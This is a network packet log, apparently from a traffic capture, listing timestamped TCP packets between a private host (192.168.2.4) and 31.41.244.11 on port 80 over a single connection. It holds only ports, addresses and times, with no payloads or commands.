Dec 22, 2024 02:16:53.006515026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006520987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006539106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006552935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006551981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006571054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006587982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.006592035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006604910 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.006623983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007348061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007395029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007450104 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007467031 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007482052 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007498980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007505894 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007514954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007533073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007534981 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007570982 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007575035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.007597923 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.007605076 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008409023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008426905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008441925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008454084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008459091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008474112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008474112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008482933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008491993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008502007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008507967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008522034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008526087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.008531094 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008553028 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.008564949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009365082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009381056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009397030 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009408951 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009413958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009423018 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009429932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009442091 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009447098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009455919 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009464025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009473085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009480953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.009490013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009505987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.009522915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.010245085 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.010268927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.010288000 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.010303974 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.030555010 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.030596972 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.030651093 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.030668020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.030689955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.030699015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.030855894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.030896902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.031024933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.031040907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.031059980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.031079054 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.031255007 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.031291962 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.179245949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179461002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179483891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179507017 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179529905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.179569960 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.179661036 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179680109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179702997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.179722071 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.179852962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.179893970 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.180114985 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180155039 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.180182934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180201054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180222034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.180233002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.180401087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180439949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.180859089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180953026 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180969954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.180993080 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.181011915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.181371927 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.181472063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.181489944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.181514025 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.181533098 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.181689978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182063103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.182190895 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182230949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.182293892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182311058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182336092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.182348013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.182509899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182548046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.182949066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.182987928 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183054924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183072090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183092117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183103085 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183259964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183299065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183732986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183773041 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183834076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183850050 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.183871031 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.183881998 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.184056997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.184094906 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.184513092 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.184551001 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.184617996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.184634924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.184658051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.184670925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.184839964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.184886932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.185285091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.185322046 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.185384989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.185401917 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.185421944 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.185434103 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.185596943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.185633898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.186078072 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.186182022 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.186198950 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.186223984 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.186249971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.186399937 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.186994076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187035084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.187158108 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187175035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187191963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187213898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.187226057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.187649012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187764883 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187782049 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.187810898 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.187824965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.187978029 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.188438892 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.188479900 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.188541889 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.188559055 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.188600063 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.188746929 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.188786983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.189205885 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.189322948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.189338923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.189366102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.189388990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.189532995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.189996004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190040112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.190094948 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190114021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190154076 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.190315008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190352917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.190773964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190888882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190906048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.190929890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.190954924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.191097975 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.191586018 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.191627979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.191675901 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.191694021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.191735983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.191895962 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.191934109 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.192363024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.192459106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.192476034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.192498922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.192518950 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.192682028 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.193259001 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.193300009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.193351984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.193377972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.193419933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.193473101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.193511009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.193958998 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194052935 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194062948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194072008 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194091082 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194104910 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194279909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194319963 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194694996 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194742918 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194832087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194849014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.194873095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.194885015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.195023060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.195065022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.195508957 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.195552111 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.195605993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.195622921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.195643902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.195658922 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.195815086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.195853949 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.196290970 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.196330070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.196410894 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.196429014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.196471930 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.196619034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197123051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197165012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.197212934 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197231054 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197251081 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.197272062 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.197412968 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197452068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.197875977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197915077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.197966099 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.197981119 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.198000908 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.198016882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.222805023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.222881079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.222897053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.223033905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.223033905 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.223112106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.223238945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.223256111 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.223280907 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.223294020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.223448992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.226063013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.371560097 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.371599913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.371618032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.371767044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.371814013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.371814013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.371921062 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.371953011 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.371967077 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.372045994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.372064114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.372088909 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.372101068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.372370958 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.372467995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.372484922 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.372520924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.372550011 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.372678995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.373121977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.373167038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.373214006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.373231888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.373270988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.373430967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.373472929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.373954058 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374069929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.374082088 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374099016 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374126911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.374145985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.374277115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374690056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374735117 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.374778986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374795914 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.374840975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.374995947 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.375039101 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.375452995 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.375557899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.375575066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.375603914 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.375628948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.375808954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.376249075 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.376296043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.376365900 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.376384020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.376426935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.376584053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.376625061 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.377022982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377146959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377162933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377202988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.377232075 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.377371073 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377835035 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377888918 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.377916098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377933025 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.377974987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.378144979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.378185987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.378583908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.378716946 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.378734112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.378766060 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.378792048 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:53.378943920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:53.379379034 CET	80	49872	31.41.244.11	192.168.2.4
